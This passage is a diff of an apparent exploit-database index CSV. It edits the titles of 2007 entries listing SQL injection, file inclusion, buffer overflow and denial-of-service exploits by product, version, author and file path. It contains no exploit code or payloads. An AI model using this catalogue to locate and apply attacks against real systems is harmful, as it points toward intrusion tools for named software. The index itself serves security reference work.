(i-accueil.php chemin) Remote File Include Vulnerability",2007-01-12,GoLd_M,php,webapps,0 @@ -2812,10 +2812,10 @@ id,file,description,date,author,platform,type,port 3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit",2007-01-17,UmZ,windows,remote,21 3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 (email.php id variable) Remote SQL Injection Exploit",2007-01-17,SlimTim10,php,webapps,0 3142,platforms/windows/dos/3142.html,"CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service Exploit",2007-01-17,shinnai,windows,dos,0 -3143,platforms/php/webapps/3143.php,"Woltlab Burning Board <= 1.0.2, 2.3.6 search.php SQL Injection Exploit",2007-01-17,"silent vapor",php,webapps,0 -3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board <= 1.0.2, 2.3.6 search.php SQL Injection Exploit 2",2007-01-17,trew,php,webapps,0 +3143,platforms/php/webapps/3143.php,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (1)",2007-01-17,"silent vapor",php,webapps,0 +3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (2)",2007-01-17,trew,php,webapps,0 3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a (mep/frame.php) Remote File Include Vulnerability",2007-01-17,v1per-haCker,php,webapps,0 -3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board <= 1.0.2, 2.3.6 search.php SQL Injection Exploit 3",2007-01-17,666,php,webapps,0 +3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (3)",2007-01-17,666,php,webapps,0 3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 (frontpage.php) Remote File Include Vulnerability",2007-01-17,GoLd_M,php,webapps,0 3148,platforms/windows/remote/3148.pl,"MS Internet Explorer VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0 3149,platforms/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 (.CNT) Buffer Overflow Exploit",2007-01-17,porkythepig,windows,local,0 @@ -2865,7 +2865,7 @@ id,file,description,date,author,platform,type,port 3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - Remote SQL Injection Vulnerability",2007-01-25,ajann,asp,webapps,0 3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 (print.asp) Remote SQL Injection Vulnerability",2007-01-25,ajann,asp,webapps,0 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 Multiple Vulnerabilities Exploit",2007-01-25,DarkFig,php,webapps,0 -3197,platforms/asp/webapps/3197.txt,"Forum Livre 1.0 (SQL Injection / XSS) Multiple Remote Vulnerabilities",2007-01-25,ajann,asp,webapps,0 +3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 (sql injection / xss) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0 3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 (vp/configure.php) Remote File Include Vulnerability",2007-01-25,GoLd_M,php,webapps,0 3200,platforms/osx/dos/3200.rb,"Apple CFNetwork HTTP Response Denial of Service Exploit (rb code)",2007-01-25,MoAB,osx,dos,0 3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 (package.php) Remote File Include Vulnerability",2007-01-26,"Cold Zero",php,webapps,0 @@ -2950,9 +2950,9 @@ id,file,description,date,author,platform,type,port 3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 (top.inc.php rootdir) Remote File Include Vulnerability",2007-02-07,GoLd_M,php,webapps,0 3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 (index_album.php) Remote File Include Vulnerability",2007-02-07,MadNet,php,webapps,0 3282,platforms/php/webapps/3282.pl,"Advanced Poll <= 2.0.5-dev Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0 -3283,platforms/php/webapps/3283.txt,"OTSCMS <= 2.1.5 (SQL/XSS) Multiple Remote Vulnerabilities",2007-02-07,GregStar,php,webapps,0 +3283,platforms/php/webapps/3283.txt,"otscms <= 2.1.5 (sql/xss) Multiple Vulnerabilities",2007-02-07,GregStar,php,webapps,0 3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability",2007-02-07,Denven,php,webapps,0 -3285,platforms/php/webapps/3285.htm,"Site-Assistant <= v0990 (paths[version]) Remote File Include Exploit",2007-02-08,ajann,php,webapps,0 +3285,platforms/php/webapps/3285.htm,"Site-Assistant <= 0990 - (paths[version]) Remote File Include Exploit",2007-02-08,ajann,php,webapps,0 3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 (index.php projectid) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 3287,platforms/php/webapps/3287.asp,"LushiNews <= 1.01 (comments.php) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 3288,platforms/php/webapps/3288.asp,"LushiWarPlaner 1.0 (register.php) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 @@ -3110,7 +3110,7 @@ id,file,description,date,author,platform,type,port 3443,platforms/php/webapps/3443.txt,"PMB Services <= 3.0.13 Multiple Remote File Inclusion Vulnerability",2007-03-09,K-159,php,webapps,0 3444,platforms/windows/dos/3444.pl,"MS Internet Explorer (FTP Server Response) DoS Exploit (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0 3447,platforms/php/webapps/3447.txt,"Grayscale Blog 0.8.0 (Security Bypass/SQL/XSS) Multiple Remote Vulns",2007-03-09,Omni,php,webapps,0 -3448,platforms/php/webapps/3448.txt,"WORK system e-commerce <= 3.0.5 Remote File Inclusion Vulnerability",2007-03-10,"Rodrigo Duarte",php,webapps,0 +3448,platforms/php/webapps/3448.txt,"work system e-commerce <= 3.0.5 - Remote File Inclusion Vulnerability",2007-03-10,"Rodrigo Duarte",php,webapps,0 3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 (index.php ID) Remote SQL Injection Vulnerability",2007-03-10,WiLdBoY,php,webapps,0 3450,platforms/php/webapps/3450.php,"NukeSentinel <= 2.5.06 (MySQL => 4.0.24) - Remote SQL Injection Exploit",2007-03-10,DarkFig,php,webapps,0 3451,platforms/windows/local/3451.c,"Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)",2007-03-10,"Cesar Cerrudo",windows,local,0 @@ -3150,8 +3150,8 @@ id,file,description,date,author,platform,type,port 3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability",2007-03-15,the_day,php,webapps,0 3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 (update.php functions_dir) Remote File Inclusion Exploit",2007-03-15,Crackers_Child,php,webapps,0 3488,platforms/windows/local/3488.php,"PHP <= 4.4.6 ibase_connect() Local Buffer Overflow Exploit",2007-03-15,rgod,windows,local,0 -3489,platforms/php/webapps/3489.txt,"Creative Guestbook 1.0 Multiple Remote Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 -3490,platforms/php/webapps/3490.txt,"WBBlog (XSS/SQL) Multiple Remote Vulnerabilities",2007-03-15,"Mehmet Ince",php,webapps,0 +3489,platforms/php/webapps/3489.txt,"creative guestbook 1.0 Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 +3490,platforms/php/webapps/3490.txt,"wbblog (xss/sql) Multiple Vulnerabilities",2007-03-15,"Mehmet Ince",php,webapps,0 3491,platforms/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution Exploit PoC",2007-03-15,"Core Security",bsd,remote,0 3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 (includedir) Remote File Inclusion Vulnerability",2007-03-15,Drackanz,php,webapps,0 3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 (gallery.asp categoryid) SQL Injection Vuln",2007-03-15,WiLdBoY,asp,webapps,0 @@ -3192,14 +3192,14 @@ id,file,description,date,author,platform,type,port 3529,platforms/linux/local/3529.php,"PHP <= 5.2.1 hash_update_file() Freed Resource Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3530,platforms/php/webapps/3530.pl,"Monster Top List <= 1.4.2 (functions.php root_path) RFI Exploit",2007-03-20,fluffy_bunny,php,webapps,0 3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 Remote Heap Overflow Exploit (win2k SP4)",2007-03-21,"Winny Thomas",windows,remote,554 -3532,platforms/php/webapps/3532.txt,"Study planner (Studiewijzer) <= 0.15 Remote File Inclusion Vulnerability",2007-03-21,K-159,php,webapps,0 +3532,platforms/php/webapps/3532.txt,"study planner (studiewijzer) <= 0.15 - Remote File Inclusion Vulnerability",2007-03-21,K-159,php,webapps,0 3533,platforms/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b (module.php) Remote File Inclusion Vulnerability",2007-03-21,"Cold Zero",php,webapps,0 3534,platforms/asp/webapps/3534.txt,"Active Link Engine (default.asp catid) Remote SQL Injection Vulnerability",2007-03-21,CyberGhost,asp,webapps,0 3535,platforms/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone (Digest domain) DoS Exploit",2007-03-21,MADYNES,hardware,dos,0 3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery (default.asp catid) SQL Injection Vulnerability",2007-03-21,CyberGhost,asp,webapps,0 3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4)",2007-03-21,"Winny Thomas",windows,remote,143 3538,platforms/php/webapps/3538.txt,"php-revista <= 1.1.2 Multiple Remote SQL Injection Vulnerabilities",2007-03-21,"Cold Zero",php,webapps,0 -3539,platforms/php/webapps/3539.txt,"Mambo Component nfnaddressbook 0.4 Remote File Inclusion Vulnerability",2007-03-21,"Cold Zero",php,webapps,0 +3539,platforms/php/webapps/3539.txt,"mambo component nfnaddressbook 0.4 - Remote File Inclusion Vulnerability",2007-03-21,"Cold Zero",php,webapps,0 3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (egghunter mod)",2007-03-21,muts,windows,remote,143 3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit",2007-03-22,"Umesh Wanve",windows,remote,69 3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 (BASE) Remote File Inclusion Vulnerabilities",2007-03-22,GoLd_M,php,webapps,0 @@ -3209,7 +3209,7 @@ id,file,description,date,author,platform,type,port 3546,platforms/asp/webapps/3546.txt,"aspWebCalendar 4.5 (calendar.asp eventid) SQL Injection Vulnerability",2007-03-22,parad0x,asp,webapps,0 3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service Exploit",2007-03-22,DiGitalX,windows,dos,0 3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 (op) Local File Inclusion Exploit",2007-03-23,GoLd_M,php,webapps,0 -3549,platforms/asp/webapps/3549.txt,"Active Trade v 2 (default.asp catid) Remote SQL Injection Vulnerability",2007-03-23,CyberGhost,asp,webapps,0 +3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - (default.asp catid) Remote SQL Injection Vulnerability",2007-03-23,CyberGhost,asp,webapps,0 3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 (buyersend.asp catid) SQL Injection Vulnerability",2007-03-23,CyberGhost,asp,webapps,0 3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 (default.asp catid) SQL Injection Vulnerability",2007-03-23,CyberGhost,asp,webapps,0 3552,platforms/php/webapps/3552.txt,"Philex <= 0.2.3 RFI / File Disclosure Remote Vulnerabilities",2007-03-23,GoLd_M,php,webapps,0 @@ -3291,11 +3291,11 @@ id,file,description,date,author,platform,type,port 3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser <= 0.92 (genre.php) BLIND SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 3631,platforms/php/webapps/3631.txt,"Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability",2007-04-01,Dj7xpl,php,webapps,0 3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P <= 2.0 (cid) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 -3633,platforms/php/webapps/3633.htm,"XOOPS Module RM+Soft Gallery 1.0 BLIND SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 +3633,platforms/php/webapps/3633.htm,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 3634,platforms/windows/remote/3634.txt,"MS Windows XP/Vista Animated Cursor (.ANI) Remote Overflow Exploit",2007-04-01,jamikazu,windows,remote,0 3635,platforms/windows/remote/3635.txt,"MS Windows XP Animated Cursor (.ANI) Remote Overflow Exploit 2",2007-04-01,"Trirat Puttaraksa",windows,remote,0 3636,platforms/windows/remote/3636.txt,"MS Windows Animated Cursor (.ANI) Remote Exploit (eeye patch bypass)",2007-04-01,jamikazu,windows,remote,0 -3638,platforms/php/webapps/3638.txt,"MapLab MS4W 2.2.1 Remote File Inclusion Vulnerability",2007-04-02,ka0x,php,webapps,0 +3638,platforms/php/webapps/3638.txt,"maplab ms4w 2.2.1 - Remote File Inclusion Vulnerability",2007-04-02,ka0x,php,webapps,0 3639,platforms/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 (cid) Remote SQL Injection Vulnerability",2007-04-02,"Mehmet Ince",php,webapps,0 3640,platforms/php/webapps/3640.txt,"PHP-Fusion Module Arcade 1.0 (cid) Remote SQL Injection Vulnerability",2007-04-02,"Mehmet Ince",php,webapps,0 3641,platforms/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 RFI Vulnerability",2007-04-02,"Hamid Ebadi",php,webapps,0 @@ -3326,7 +3326,7 @@ id,file,description,date,author,platform,type,port 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0 3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 -3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) Multiple Vuln Exploit",2007-04-05,BlackHawk,php,webapps,0 +3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit",2007-04-05,BlackHawk,php,webapps,0 3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0 @@ -3344,7 +3344,7 @@ id,file,description,date,author,platform,type,port 3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0 3688,platforms/windows/local/3688.c,"MS Windows GDI Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities",2007-04-08,Dj7xpl,php,webapps,0 -3690,platforms/windows/dos/3690.txt,"Microsoft Office Word 2007 Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 +3690,platforms/windows/dos/3690.txt,"microsoft office word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability",2007-04-09,"h a c k e r _ X",php,webapps,0 3692,platforms/windows/local/3692.c,"IrfanView 3.99 .ANI File Local Buffer Overflow Exploit (multiple targets)",2007-04-09,"Breno Silva Pinto",windows,local,0 3693,platforms/windows/dos/3693.txt,"MS Windows .HLP File Local HEAP Overflow PoC 0day",2007-04-09,muts,windows,dos,0 @@ -3358,7 +3358,7 @@ id,file,description,date,author,platform,type,port 3701,platforms/php/webapps/3701.txt,"Crea-Book <= 1.0 Admin Access Bypass / DB Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0 3702,platforms/php/webapps/3702.php,"InoutMailingListManager <= 3.1 Remote Command Execution Exploit",2007-04-10,BlackHawk,php,webapps,0 3703,platforms/php/webapps/3703.txt,"Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities",2007-04-10,"Cold Zero",php,webapps,0 -3704,platforms/php/webapps/3704.txt,"pL-PHP beta 0.9 Multiple Remote Vulnerabilities",2007-04-10,Omni,php,webapps,0 +3704,platforms/php/webapps/3704.txt,"pl-php beta 0.9 Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0 3705,platforms/php/webapps/3705.txt,"SimpCMS <= 04.10.2007 (site) Remote File Inclusion Vulnerability",2007-04-10,Dr.RoVeR,php,webapps,0 3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities",2007-04-11,iskorpitx,php,webapps,0 3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns",2007-04-11,"Cold Zero",php,webapps,0 @@ -3368,7 +3368,7 @@ id,file,description,date,author,platform,type,port 3711,platforms/php/webapps/3711.htm,"CodeBreak 1.1.2 (codebreak.php) Remote File Inclusion Exploit",2007-04-11,"John Martinelli",php,webapps,0 3712,platforms/php/webapps/3712.txt,"Mambo Module Weather (absolute_path) RFI Vulnerability",2007-04-11,"Cold Zero",php,webapps,0 3713,platforms/php/webapps/3713.txt,"Mambo Module Calendar (Agenda) 1.5.5 RFI Vulnerability",2007-04-11,"Cold Zero",php,webapps,0 -3714,platforms/php/webapps/3714.txt,"Joomla Component mosMedia <= 1.0.8 Remote File Inclusion Vulnerability",2007-04-11,GoLd_M,php,webapps,0 +3714,platforms/php/webapps/3714.txt,"joomla component mosmedia <= 1.0.8 - Remote File Inclusion Vulnerability",2007-04-11,GoLd_M,php,webapps,0 3715,platforms/windows/dos/3715.py,"Sami HTTP Server 2.0.1 POST Request Denial of Service Exploit",2007-04-12,shinnai,windows,dos,0 3716,platforms/php/webapps/3716.pl,"mxBB Module MX Shotcast 1.0 RC2 (getinfo1.php) RFI Exploit",2007-04-12,bd0rk,php,webapps,0 3717,platforms/php/webapps/3717.txt,"WebKalk2 1.9.0 (absolute_path) Remote File Inclusion Vulnerability",2007-04-12,GoLd_M,php,webapps,0 @@ -3382,14 +3382,14 @@ id,file,description,date,author,platform,type,port 3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 Remote Denial of Service Exploit",2007-04-13,evilrabbi,multiple,dos,0 3727,platforms/windows/local/3727.c,"VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit",2007-04-13,InTeL,windows,local,0 3728,platforms/windows/remote/3728.c,"IE NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit",2007-04-13,InTeL,windows,remote,0 -3729,platforms/php/webapps/3729.txt,"QDBlog 0.4 (SQL Injection/LFI) Multiple Remote Vulnerabilities",2007-04-13,Omni,php,webapps,0 +3729,platforms/php/webapps/3729.txt,"qdblog 0.4 (sql injection/lfi) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0 3730,platforms/linux/local/3730.txt,"ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 3731,platforms/php/webapps/3731.php,"Frogss CMS <= 0.7 Remote SQL Injection Exploit",2007-04-13,Kacper,php,webapps,0 3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 (repertoire_config) Remote File Inclusion Vulnerabilities",2007-04-13,GoLd_M,php,webapps,0 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability",2007-04-14,irvian,php,webapps,0 -3734,platforms/php/webapps/3734.txt,"Joomla Module AutoStand 1.0 Remote File Inclusion Vulnerability",2007-04-14,"Cold Zero",php,webapps,0 +3734,platforms/php/webapps/3734.txt,"joomla module autostand 1.0 - Remote File Inclusion Vulnerability",2007-04-14,"Cold Zero",php,webapps,0 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution Vulnerability",2007-04-14,Gammarays,php,webapps,0 -3736,platforms/php/webapps/3736.txt,"Mambo/Joomla Component Article 1.1 Remote File Inclusion Vulnerability",2007-04-14,"Cold Zero",php,webapps,0 +3736,platforms/php/webapps/3736.txt,"mambo/joomla component article 1.1 - Remote File Inclusion Vulnerability",2007-04-14,"Cold Zero",php,webapps,0 3737,platforms/windows/remote/3737.py,"MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)",2007-04-15,"Winny Thomas",windows,remote,139 3738,platforms/windows/remote/3738.php,"XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit",2007-04-15,rgod,windows,remote,80 3739,platforms/php/webapps/3739.php,"Papoo <= 3.02 (kontakt menuid) Remote SQL Injection Exploit",2007-04-15,Kacper,php,webapps,0 @@ -3403,7 +3403,7 @@ id,file,description,date,author,platform,type,port 3747,platforms/php/webapps/3747.txt,"openMairie 1.10 (scr/soustab.php) Local File Inclusion Vulnerability",2007-04-16,GoLd_M,php,webapps,0 3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart <= 3.5 (abs_path) RFI Vulnerabilities",2007-04-16,irvian,php,webapps,0 3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery (GALLERY_BASEDIR) RFI Vulnerabilities",2007-04-16,"Alkomandoz Hacker",php,webapps,0 -3750,platforms/php/webapps/3750.txt,"XOOPS Module tsdisplay4xoops 0.1 Remote File Inclusion Vulnerability",2007-04-16,GoLd_M,php,webapps,0 +3750,platforms/php/webapps/3750.txt,"xoops module tsdisplay4xoops 0.1 - Remote File Inclusion Vulnerability",2007-04-16,GoLd_M,php,webapps,0 3751,platforms/php/webapps/3751.txt,"Anthologia 0.5.2 (index.php ads_file) Remote File Inclusion Vulnerability",2007-04-17,Dj7xpl,php,webapps,0 3752,platforms/php/webapps/3752.txt,"AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities",2007-04-17,"Alkomandoz Hacker",php,webapps,0 3753,platforms/php/webapps/3753.txt,"Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) RFI",2007-04-17,"Cold Zero",php,webapps,0 @@ -3418,7 +3418,7 @@ id,file,description,date,author,platform,type,port 3762,platforms/php/webapps/3762.htm,"AimStats 3.2 (process.php update) Remote Code Execution Exploit",2007-04-18,Dj7xpl,php,webapps,0 3763,platforms/php/webapps/3763.txt,"Rezervi 0.9 (root) Remote File Inclusion Vulnerabilities",2007-04-18,GoLd_M,php,webapps,0 3764,platforms/php/webapps/3764.txt,"Zomplog 3.8 (force_download.php file) Remote File Disclosure Vuln",2007-04-18,Dj7xpl,php,webapps,0 -3765,platforms/php/webapps/3765.txt,"OpenSurveyPilot <= 1.2.1 Remote File Inclusion Vulnerability",2007-04-18,"Alkomandoz Hacker",php,webapps,0 +3765,platforms/php/webapps/3765.txt,"opensurveypilot <= 1.2.1 - Remote File Inclusion Vulnerability",2007-04-18,"Alkomandoz Hacker",php,webapps,0 3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 Remote File Inclusion Vuln",2007-04-19,bd0rk,php,webapps,0 3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 (error.asp id) Remote SQL Injection Vulnerability",2007-04-19,CyberGhost,asp,webapps,0 3768,platforms/windows/dos/3768.pl,"Winamp <= 5.3 (WMV File) Remote Denial of Service Exploit",2007-04-19,WiLdBoY,windows,dos,0 @@ -3467,7 +3467,7 @@ id,file,description,date,author,platform,type,port 3811,platforms/windows/local/3811.c,"IrfanView <= 4.00 .IFF File Buffer Overflow Exploit",2007-04-27,Marsu,windows,local,0 3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 .PNG File BoF Exploit",2007-04-27,Marsu,windows,local,0 3813,platforms/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 Remote SQL Injection Vulnerability",2007-04-28,"Mehmet Ince",php,webapps,0 -3814,platforms/php/webapps/3814.txt,"Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability",2007-04-29,GoLd_M,php,webapps,0 +3814,platforms/php/webapps/3814.txt,"wordpress plugin mygallery <= 1.4b4 - Remote File Inclusion Vulnerability",2007-04-29,GoLd_M,php,webapps,0 3815,platforms/linux/remote/3815.c,"Fenice OMS server 1.10 Remote Buffer Overflow Exploit (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 3816,platforms/php/webapps/3816.php,"TCExam <= 4.0.011 (SessionUserLang) Shell Injection Exploit",2007-04-29,rgod,php,webapps,0 3817,platforms/php/webapps/3817.txt,"Imageview 5.3 (fileview.php album) Local File Inclusion Vulnerability",2007-04-29,DNX,php,webapps,0 @@ -3510,7 +3510,7 @@ id,file,description,date,author,platform,type,port 3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a (right_file) Remote File Inclusion Vulnerability",2007-05-04,kezzap66345,php,webapps,0 3855,platforms/php/webapps/3855.php,"Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution (2)",2007-05-04,Gu1ll4um3r0m41n,php,webapps,0 3856,platforms/windows/local/3856.htm,"East Wind Software (advdaudio.ocx 1.5.1.1) Local BoF Exploit",2007-05-05,shinnai,windows,local,0 -3857,platforms/php/webapps/3857.txt,"vm watermark for Gallery 0.4.1 Remote File Inclusion Vulnerability",2007-05-05,"ThE TiGeR",php,webapps,0 +3857,platforms/php/webapps/3857.txt,"vm watermark for gallery 0.4.1 - Remote File Inclusion Vulnerability",2007-05-05,"ThE TiGeR",php,webapps,0 3858,platforms/php/webapps/3858.php,"Nuked-klaN 1.7.6 Remote Code Execution Exploit",2007-05-05,DarkFig,php,webapps,0 3859,platforms/php/webapps/3859.txt,"Archangel Weblog 0.90.02 Local File Inclusion / Admin Bypass Vulns",2007-05-05,Dj7xpl,php,webapps,0 3860,platforms/php/webapps/3860.txt,"PHPtree 1.3 (cms2.php s_dir) Remote File Inclusion Vulnerability",2007-05-05,"ThE TiGeR",php,webapps,0 @@ -3574,7 +3574,7 @@ id,file,description,date,author,platform,type,port 3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 (newsadmin.php action) RFI Vuln",2007-05-14,Mogatil,php,webapps,0 3921,platforms/windows/dos/3921.html,"Clever Database Comparer ActiveX 2.2 Remote Buffer Overflow PoC",2007-05-14,shinnai,windows,dos,0 3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 (GET Request) Remote Root Exploit (exec-shield)",2007-05-14,Xpl017Elz,linux,remote,8080 -3923,platforms/php/webapps/3923.txt,"Linksnet Newsfeed 1.0 Remote File Inclusion Vulnerability",2007-05-14,"ThE TiGeR",php,webapps,0 +3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion Vulnerability",2007-05-14,"ThE TiGeR",php,webapps,0 3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog <= 1.4.8a Remote File Inclusion Vulnerability",2007-05-14,"ThE TiGeR",php,webapps,0 3925,platforms/windows/remote/3925.py,"TinyIdentD <= 2.2 Remote Buffer Overflow Exploit",2007-05-14,"Thomas Pollet",windows,remote,113 3926,platforms/windows/dos/3926.py,"MS Windows Vista forged ARP packet Network Stack DoS Exploit",2007-05-15,"Kristian Hermansen",windows,dos,0 @@ -3582,12 +3582,12 @@ id,file,description,date,author,platform,type,port 3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 (atk.inc config_atkroot) Remote File Inclusion Vulnerability",2007-05-15,Katatafish,php,webapps,0 3929,platforms/windows/dos/3929.txt,"BitsCast 0.13.0 (invalid string) Remote Denial of Service Exploit",2007-05-15,gbr,windows,dos,0 3930,platforms/windows/dos/3930.txt,"NewzCrawler 1.8 (invalid string) Remote Denial of Service Exploit",2007-05-15,gbr,windows,dos,0 -3931,platforms/php/webapps/3931.htm,"XOOPS Module resmanager <= 1.21 BLIND SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 +3931,platforms/php/webapps/3931.htm,"XOOPS Module resmanager <= 1.21 - Blind SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie <= 1.7 (sid) Remote SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 (index.php) SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 3934,platforms/windows/remote/3934.py,"Eudora 7.1 SMTP ResponseRemote Remote Buffer Overflow Exploit",2007-05-15,h07,windows,remote,0 3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 custom_vars.php Remote File Inclusion Vulnerability",2007-05-16,BeyazKurt,php,webapps,0 -3936,platforms/asp/webapps/3936.txt,"RunawaySoft Haber portal 1.0 (tr) Multiple Remote Vulnerabilities",2007-05-16,kerem125,asp,webapps,0 +3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 (tr) Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0 